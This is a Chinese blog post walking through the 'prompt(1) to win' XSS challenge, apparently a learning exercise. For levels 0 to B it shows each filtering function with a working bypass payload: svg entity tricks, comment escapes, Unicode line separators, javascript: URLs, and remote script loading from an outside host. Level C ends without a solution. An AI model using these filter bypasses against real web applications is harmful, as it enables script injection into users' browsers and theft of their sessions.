<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":true},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="prompt(1) to win">
<meta property="og:type" content="article">
<meta property="og:title" content="scw&#39;blog">
<meta property="og:url" content="http://example.com/2022/05/25/prompt(1)%20to%20win/index.html">
<meta property="og:site_name" content="scw&#39;blog">
<meta property="og:description" content="prompt(1) to win">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-05-25T10:27:21.520Z">
<meta property="article:modified_time" content="2022-05-25T10:18:07.882Z">
<meta property="article:author" content="scw">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2022/05/25/prompt(1)%20to%20win/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title> | scw'blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="scw'blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">scw'blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section"><i class="link fa-fw"></i>友链</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/05/25/prompt(1)%20to%20win/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/imagesi/avatar.gif">
      <meta itemprop="name" content="scw">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="scw'blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-05-25 18:27:21 / 修改时间：18:18:07" itemprop="dateCreated datePublished" datetime="2022-05-25T18:27:21+08:00">2022-05-25</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="prompt-1-to-win"><a href="#prompt-1-to-win" class="headerlink" title="prompt(1) to win"></a>prompt(1) to win</h1><span id="more"></span>

<p>注：prompt()方法用于显示可提示用户进行输入的对话框。方法返回用户输入的字符串。语法：<code>prompt(msg,defaulltText)</code>&#x2F;&#x2F;长细框内是<code>msg</code>,p长细框内是<code>defaultText</code></p>
<h3 id="Level-0"><a href="#Level-0" class="headerlink" title="Level 0"></a>Level 0</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">function escape(input) &#123;</span><br><span class="line">    // warm up</span><br><span class="line">    // script should be executed without user interaction</span><br><span class="line">    return &#x27;&lt;input type=&quot;text&quot; value=&quot;&#x27; + input + &#x27;&quot;&gt;&#x27;;</span><br><span class="line">&#125;    </span><br></pre></td></tr></table></figure>

<p>Payload:<code>&quot;&gt;&lt;script&gt;prompt(1)&lt;/script&gt;</code></p>
<h3 id="Level-1"><a href="#Level-1" class="headerlink" title="Level 1"></a>Level 1</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">function escape(input) &#123;</span><br><span class="line">    // tags stripping mechanism from ExtJS library</span><br><span class="line">    // Ext.util.Format.stripTags</span><br><span class="line">    var stripTagsRE = /&lt;\/?[^&gt;]+&gt;/gi;</span><br><span class="line">    input = input.replace(stripTagsRE, &#x27;&#x27;);</span><br><span class="line"></span><br><span class="line">    return &#x27;&lt;article&gt;&#x27; + input + &#x27;&lt;/article&gt;&#x27;;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>该题利用了正则表达式过滤了所有<code>&lt;&gt;</code>形式的输入，因此可以考虑利用<code>onerror</code></p>
<p><strong>payload(1)</strong>:<code>&lt;img src onerror=prompt(1)//</code>,使用<code>//</code>注释掉了<code>&lt;/article&gt;</code>中的<code>&lt;</code>使标签完成闭合</p>
<p><strong>payload(2)</strong>:在<code>&lt;body onload=&quot;load()&quot;&gt;</code>:页面加载之后立即执行一段 <code>JavaScript</code>,<code>&lt;body onload=&quot;javascript:prompt(1);&quot;</code></p>
<h3 id="Level-2"><a href="#Level-2" class="headerlink" title="Level 2"></a>Level 2</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">function escape(input) &#123;</span><br><span class="line">    //                      v-- frowny face</span><br><span class="line">    input = input.replace(/[=(]/g, &#x27;&#x27;);</span><br><span class="line"></span><br><span class="line">    // ok seriously, disallows equal signs and open parenthesis</span><br><span class="line">    return input;</span><br><span class="line">&#125;      </span><br></pre></td></tr></table></figure>

<p>该题通过正则表达式过滤了<code>= (</code>，无法运用上两题的思路，可以考虑用<code>svg</code>标签</p>
<p><code>svg</code>标签:</p>
<p>即 <code>Scalable Vector Graphics</code>，是一种用来绘制矢量图的 <code>HTML5</code> 标签。<br><code>svg</code>标签中的元素会先进行编码转换，所以十进制下的<code>&amp;#40</code>或者<code>&amp;#x28;</code>会被转换为(<br><code>svg</code>会提前将将<code>XML</code>实体解析再加入标签</p>
<p><strong>payload(1)</strong>:<code>&lt;svg&gt;&lt;script&gt;prompt&amp;#40;1)&lt;/script&gt;&lt;/svg&gt;</code></p>
<p>或者考虑用<code>call()</code>方法</p>
<p><strong>payload(2)</strong>:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;prompt.call`$&#123;1&#125;`&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<h3 id="Level-3"><a href="#Level-3" class="headerlink" title="Level 3"></a>Level 3</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">function escape(input) &#123;</span><br><span class="line">    // filter potential comment end delimiters</span><br><span class="line">    input = input.replace(/-&gt;/g, &#x27;_&#x27;);</span><br><span class="line"></span><br><span class="line">    // comment the input to avoid script execution</span><br><span class="line">    return &#x27;&lt;!-- &#x27; + input + &#x27; --&gt;&#x27;;</span><br><span class="line">&#125;    </span><br></pre></td></tr></table></figure>

<p>在<code>html</code>中可以利用<code>--!&gt;</code>去闭合<code>&lt;!--</code></p>
<p><strong>payload</strong>:<code>--!&gt;&lt;script&gt;prompt(1)&lt;/script&gt;</code></p>
<h3 id="Level-4"><a href="#Level-4" class="headerlink" title="Level 4"></a>Level 4</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">function escape(input) &#123;</span><br><span class="line">    // make sure the script belongs to own site</span><br><span class="line">    // sample script: http://prompt.ml/js/test.js</span><br><span class="line">    if (/^(?:https?:)?\/\/prompt\.ml\//i.test(decodeURIComponent(input))) &#123;</span><br><span class="line">        var script = document.createElement(&#x27;script&#x27;);</span><br><span class="line">        script.src = input;</span><br><span class="line">        return script.outerHTML;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        return &#x27;Invalid resource.&#x27;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>该题通过正则表达式必须以<code>https://prompt.ml/</code>的形式输入，该题是需要调用远程文件，在浏览器中支持<code>https://prompt.ml@xxxx.com</code>的形式，却不支持<code>https://prompt.ml/@xxxx.com</code>的形式，因此可以考虑吧利用url编码输入<code>%2f</code>绕过,然后再服务器上建立一个<code>js</code>的文件，在里面输入<code>prompt(1)</code>即可</p>
<p><strong>payload</strong>:<code>http://prompt.ml%2f@lzhnb.site/xss.js</code></p>
<h3 id="Level-5"><a href="#Level-5" class="headerlink" title="Level 5"></a>Level 5</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">function escape(input) &#123;</span><br><span class="line">    // apply strict filter rules of level 0</span><br><span class="line">    // filter &quot;&gt;&quot; and event handlers</span><br><span class="line">    input = input.replace(/&gt;|on.+?=|focus/gi, &#x27;_&#x27;);</span><br><span class="line"></span><br><span class="line">    return &#x27;&lt;input value=&quot;&#x27; + input + &#x27;&quot; type=&quot;text&quot;&gt;&#x27;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>该题通过正则表达式过滤了<code>&gt; onxxx= focus</code>,可以利用image类型将后面的text类型给覆盖，再利用回车绕过<code>onxxx=</code></p>
<p><strong>payload</strong>:&#96;&#96;</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;type=&quot;</span>image<span class="string">&quot; src onerror</span></span><br><span class="line"><span class="string">=&quot;</span><span class="title function_">prompt</span>(<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<h3 id="Level-6"><a href="#Level-6" class="headerlink" title="Level 6"></a>Level 6</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">function escape(input) &#123;</span><br><span class="line">    // let&#x27;s do a post redirection</span><br><span class="line">    try &#123;</span><br><span class="line">        // pass in formURL#formDataJSON</span><br><span class="line">        // e.g. http://httpbin.org/post#&#123;&quot;name&quot;:&quot;Matt&quot;&#125;</span><br><span class="line">        var segments = input.split(&#x27;#&#x27;);</span><br><span class="line">        var formURL = segments[0];</span><br><span class="line">        var formData = JSON.parse(segments[1]);</span><br><span class="line"></span><br><span class="line">        var form = document.createElement(&#x27;form&#x27;);</span><br><span class="line">        form.action = formURL;</span><br><span class="line">        form.method = &#x27;post&#x27;;</span><br><span class="line"></span><br><span class="line">        for (var i in formData) &#123;</span><br><span class="line">            var input = form.appendChild(document.createElement(&#x27;input&#x27;));</span><br><span class="line">            input.name = i;</span><br><span class="line">            input.setAttribute(&#x27;value&#x27;, formData[i]);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        return form.outerHTML + &#x27;                         \n\</span><br><span class="line">&lt;script&gt;                                                  \n\</span><br><span class="line">    // forbid javascript: or vbscript: and data: stuff    \n\</span><br><span class="line">    if (!/script:|data:/i.test(document.forms[0].action)) \n\</span><br><span class="line">        document.forms[0].submit();                       \n\</span><br><span class="line">    else                                                  \n\</span><br><span class="line">        document.write(&quot;Action forbidden.&quot;)               \n\</span><br><span class="line">&lt;/script&gt;                                                 \n\</span><br><span class="line">        &#x27;;</span><br><span class="line">    &#125; catch (e) &#123;</span><br><span class="line">        return &#x27;Invalid form data.&#x27;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;        </span><br></pre></td></tr></table></figure>

<p>由注释可知需要以这种形式<code>http://httpbin.org/post#&#123;&quot;name&quot;:&quot;Matt&quot;&#125;</code>填写，该题将输入的以<code># </code>分割成两个数组，前一个赋值给<code>formURL</code>，后一个赋值给<code>form.method</code>,所以在这里可以考虑<code>js</code>伪协议，真”协议用来在计算机之间传输数据包，比如http协议，ftp协议；伪协议是一种非标准化的协议，让使用者可以通过链接来调用js函数。javascript（伪协议说明符）:URL。这个特殊的协议类型声明了URL的主体是任意的javascript代码，它由javascript的解释器运行。<br><strong>payload</strong>:<code>javascript:prompt(1)#&#123;&quot;action&quot;:&quot;&quot;&#125;</code></p>
<p>HTML source：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=&quot;javascript:prompt(1)&quot; method=&quot;post&quot;&gt;&lt;input name=&quot;action&quot; value=&quot;&quot;&gt;&lt;/form&gt;                         </span><br><span class="line">&lt;script&gt;                                                  </span><br><span class="line">    // forbid javascript: or vbscript: and data: stuff    </span><br><span class="line">    if (!/script:|data:/i.test(document.forms[0].action)) </span><br><span class="line">        document.forms[0].submit();                       </span><br><span class="line">    else                                                  </span><br><span class="line">        document.write(&quot;Action forbidden.&quot;)               </span><br><span class="line">&lt;/script&gt;       </span><br></pre></td></tr></table></figure>

<p><code>name</code>处添加<code>action</code>引用添加的<code>javascript:prompt(1)</code></p>
<h3 id="Level-7"><a href="#Level-7" class="headerlink" title="Level 7"></a>Level 7</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">function escape(input) &#123;</span><br><span class="line">    // pass in something like dog#cat#bird#mouse...</span><br><span class="line">    var segments = input.split(&#x27;#&#x27;);</span><br><span class="line">    return segments.map(function(title) &#123;</span><br><span class="line">        // title can only contain 12 characters</span><br><span class="line">        return &#x27;&lt;p class=&quot;comment&quot; title=&quot;&#x27; + title.slice(0, 12) + &#x27;&quot;&gt;&lt;/p&gt;&#x27;;</span><br><span class="line">    &#125;).join(&#x27;\n&#x27;);</span><br><span class="line">&#125;       </span><br></pre></td></tr></table></figure>

<p>该题因为<code>slice()</code>方法，每个数组只能读取<code>12</code>个字符,所以可以考虑分成几个数组输入，然后通过<code>/*</code>注释方法将中间的多余字符注释掉</p>
<p><strong>payload</strong>:<code>&quot;&gt;&lt;script&gt;/*#*/prompt(1/*#*/)&lt;/script&gt;</code></p>
<h3 id="Level-8"><a href="#Level-8" class="headerlink" title="Level 8"></a>Level 8</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">function escape(input) &#123;</span><br><span class="line">    // prevent input from getting out of comment</span><br><span class="line">    // strip off line-breaks and stuff</span><br><span class="line">    input = input.replace(/[\r\n&lt;/&quot;]/g, &#x27;&#x27;);</span><br><span class="line"></span><br><span class="line">    return &#x27;                                \n\</span><br><span class="line">&lt;script&gt;                                    \n\</span><br><span class="line">    // console.log(&quot;&#x27; + input + &#x27;&quot;);        \n\</span><br><span class="line">&lt;/script&gt; &#x27;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>该题过滤了<code>\r \n</code>等行结束符无法通过输入这两个换行逃逸<code>console</code>前的注释符，以及题中还过滤了<code>&lt; \</code>，但可以考虑unicode<code>\u2028</code>和<code>\u2029</code>，这两个一个为行分隔符一个为段落分隔符，也都为行结束符可以逃逸注释符，需要注意的是要放到开发者工具中的<code>console</code>中转码(但不知为何火狐浏览器的不行)，并且在js中<code>--&gt;</code>也可以作为注释符,输入到<code>console</code>中的为<code>&quot;\u2028prompt(1)\u2028--&gt;&quot;</code></p>
<p><strong>payload</strong>:<code>&#39; prompt(1) --&gt;&#39;</code>(在<code>prompt(1)</code>两边是有两个不可见字符作为行结束符逃逸注释符)</p>
<p>开发工具与右击检查的区别：</p>
<ul>
<li>开发者工具看到的是编译后加载的所有源码，是最初下载的网页代码。</li>
<li>右键检查的只是当前页面显示的，经过ajax异步加载，js修改过的，需要动态执行JS才能获取。</li>
</ul>
<h3 id="Level-9"><a href="#Level-9" class="headerlink" title="Level 9"></a>Level 9</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">function escape(input) &#123;</span><br><span class="line">    // filter potential start-tags</span><br><span class="line">    input = input.replace(/&lt;([a-zA-Z])/g, &#x27;&lt;_$1&#x27;);</span><br><span class="line">    // use all-caps for heading</span><br><span class="line">    input = input.toUpperCase();</span><br><span class="line"></span><br><span class="line">    // sample input: you shall not pass! =&gt; YOU SHALL NOT PASS!</span><br><span class="line">    return &#x27;&lt;h1&gt;&#x27; + input + &#x27;&lt;/h1&gt;&#x27;;</span><br><span class="line">&#125;   </span><br></pre></td></tr></table></figure>

<p><code>toUpperCase()：把字符串转换为大写，而且还可以转换一些unicode字符</code></p>
<p>在该题中通过正则表达式将<code>&lt; + 字母</code>的形式全部替换为<code>&lt;_字母</code>，可以考虑用<code>ſ</code>,该字母是某国家的unicode编码会转码为<code>s</code>，同时该题还会将输入的字母大写，因此可以考虑类似<code>level 4</code>的方法，在本地服务器上放置一个xss文件，打开小皮然后输入以下<code>payload</code>(但不知为什么布能引用自己网站的文件)</p>
<p><strong>payload</strong>:<code>&lt;ſcript/ſrc=&quot;http://127.0.0.1/xss.js&quot;&gt;&lt;/ſcript&gt;</code></p>
<h3 id="Level-A"><a href="#Level-A" class="headerlink" title="Level A"></a>Level A</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">function escape(input) &#123;</span><br><span class="line">    // (╯°□°）╯︵ ┻━┻</span><br><span class="line">    input = encodeURIComponent(input).replace(/prompt/g, &#x27;alert&#x27;);</span><br><span class="line">    // ┬──┬ ﻿ノ( ゜-゜ノ) chill out bro</span><br><span class="line">    input = input.replace(/&#x27;/g, &#x27;&#x27;);</span><br><span class="line"></span><br><span class="line">    // (╯°□°）╯︵ /(.□. \）DONT FLIP ME BRO</span><br><span class="line">    return &#x27;&lt;script&gt;&#x27; + input + &#x27;&lt;/script&gt; &#x27;;</span><br><span class="line">&#125;        </span><br></pre></td></tr></table></figure>

<p><code>encodeURIComponent() 函数可把字符串作为 URI 组件进行编码,该方法不会对 ASCII 字母和数字进行编码，也不会对这些 ASCII 标点符号进行编码</code> </p>
<p>该题<code>prompt</code>被替换为<code>alert</code>，<code>&#39;</code>被过滤掉，因此可以考虑将<code>&#39;</code>放在<code>prompt</code>之间就可以绕过</p>
<p><strong>payload</strong>:<code>p&#39;rompt(1)</code></p>
<h3 id="Level-B"><a href="#Level-B" class="headerlink" title="Level B"></a>Level B</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">function escape(input) &#123;</span><br><span class="line">    // name should not contain special characters</span><br><span class="line">    var memberName = input.replace(/[[|\s+*/\\&lt;&gt;&amp;^:;=~!%-]/g, &#x27;&#x27;);</span><br><span class="line"></span><br><span class="line">    // data to be parsed as JSON</span><br><span class="line">    var dataString = &#x27;&#123;&quot;action&quot;:&quot;login&quot;,&quot;message&quot;:&quot;Welcome back, &#x27; + memberName + &#x27;.&quot;&#125;&#x27;;</span><br><span class="line"></span><br><span class="line">    // directly &quot;parse&quot; data in script context</span><br><span class="line">    return &#x27;                                \n\</span><br><span class="line">&lt;script&gt;                                    \n\</span><br><span class="line">    var data = &#x27; + dataString + &#x27;;          \n\</span><br><span class="line">    if (data.action === &quot;login&quot;)            \n\</span><br><span class="line">        document.write(data.message)        \n\</span><br><span class="line">&lt;/script&gt; &#x27;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在一个数组中，引用数组单位时，发现如果名字相同，一定会输出后面的，所以可以考虑闭合，再构造<code>&quot;message&quot;:prompt(1)</code>但发现所有的<code>:</code>都被过滤了,可以用字母操作符进行绕过，用<code>in instanceof</code>连接</p>
<p><strong>payload</strong>:<code>&quot;(prompt(1))in</code></p>
<h3 id="Level-C"><a href="#Level-C" class="headerlink" title="Level C"></a>Level C</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">function escape(input) &#123;</span><br><span class="line">    // in Soviet Russia...</span><br><span class="line">    input = encodeURIComponent(input).replace(/&#x27;/g, &#x27;&#x27;);</span><br><span class="line">    // table flips you!</span><br><span class="line">    input = input.replace(/prompt/g, &#x27;alert&#x27;);</span><br><span class="line"></span><br><span class="line">    // ノ┬─┬ノ ︵ ( \o°o)\</span><br><span class="line">    return &#x27;&lt;script&gt;&#x27; + input + &#x27;&lt;/script&gt; &#x27;;</span><br><span class="line">&#125;     </span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/05/25/jinja2%E7%9A%84flask%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/" rel="prev" title="">
      <i class="fa fa-chevron-left"></i> 
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/05/25/php%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96/" rel="next" title="">
       <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#prompt-1-to-win"><span class="nav-number">1.</span> <span class="nav-text">prompt(1) to win</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-0"><span class="nav-number">1.0.1.</span> <span class="nav-text">Level 0</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-1"><span class="nav-number">1.0.2.</span> <span class="nav-text">Level 1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-2"><span class="nav-number">1.0.3.</span> <span class="nav-text">Level 2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-3"><span class="nav-number">1.0.4.</span> <span class="nav-text">Level 3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-4"><span class="nav-number">1.0.5.</span> <span class="nav-text">Level 4</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-5"><span class="nav-number">1.0.6.</span> <span class="nav-text">Level 5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-6"><span class="nav-number">1.0.7.</span> <span class="nav-text">Level 6</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-7"><span class="nav-number">1.0.8.</span> <span class="nav-text">Level 7</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-8"><span class="nav-number">1.0.9.</span> <span class="nav-text">Level 8</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-9"><span class="nav-number">1.0.10.</span> <span class="nav-text">Level 9</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-A"><span class="nav-number">1.0.11.</span> <span class="nav-text">Level A</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-B"><span class="nav-number">1.0.12.</span> <span class="nav-text">Level B</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-C"><span class="nav-number">1.0.13.</span> <span class="nav-text">Level C</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">scw</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
